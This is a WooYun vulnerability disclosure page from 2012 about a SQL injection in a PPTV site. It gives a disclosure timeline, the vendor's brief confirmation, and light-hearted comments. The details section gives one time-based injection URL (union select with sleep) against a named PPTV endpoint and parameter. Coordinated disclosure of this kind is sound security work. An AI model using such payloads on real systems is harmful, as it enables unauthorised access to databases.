当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011971

漏洞标题:pptv注射漏洞

相关厂商:PPTV(PPlive)

漏洞作者: Coody

提交时间:2012-09-10 11:14

修复时间:2012-10-25 11:14

公开时间:2012-10-25 11:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-10: 细节已通知厂商并且等待厂商处理中
2012-09-10: 厂商已经确认,细节仅向厂商公开
2012-09-20: 细节向核心白帽子及相关领域专家公开
2012-09-30: 细节向普通白帽子公开
2012-10-10: 细节向实习白帽子公开
2012-10-25: 细节向公众公开

简要描述:

话说全宇宙最帅的男人提交了一个pptv任意文件上传的的漏洞,我这羡慕呀,,心想我能不能找到一个牛X点的漏洞呢~~结果就发现了这么一个注射漏洞。

详细说明:

这里我只是简单的手工了一下,确实存在注射点。
先睡上5秒 

http://d.pptv.com/phonelist.php?do=one&jx=11 union select 1,2,3,4 and sleep(5)#&sj=&yqid=0


漏洞证明:



修复方案:

你们更专业。

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-09-10 13:38

厂商回复:

thx;发重了。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-09-10 11:42 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    如有公仔请寄给only_guest

  2. 2012-09-10 11:44 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @风萧萧 如有公仔请寄给 Coody 就好啦。。。嘎嘎。。。。还没收到过礼物呢。。~~~~(>_<)~~~~

  3. 2012-09-10 11:50 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @风萧萧 好骚年@Coody 小布看来你也挺无聊

  4. 2012-09-10 11:59 | Bincker ( 普通白帽子 | Rank:193 漏洞数:23 )

    小布流弊了...

  5. 2012-09-10 12:00 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @only_guest 还好吧,看你提交了,我的手也不经的颤抖了一下。。。哈哈

  6. 2012-09-10 12:01 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    小布这厮激动了一上午,自从only_guest提交了一个PPTV漏洞以后,PPTV跟过年似的,太热闹了。。。。

  7. 2012-09-10 14:32 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    @风萧萧 @Coody @鬼魅羊羔 @only_guest 哥表示不是很喜欢过年;

  8. 2012-09-10 15:19 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    如有公仔请寄给only_guest

  9. 2012-09-10 15:29 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @Eoh 崩溃呀,貌似木有公仔啊

  10. 2012-09-10 15:36 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    @Coody 不会把 这都刷屏了 还木有公仔? 难道要逆天才有?@only_guest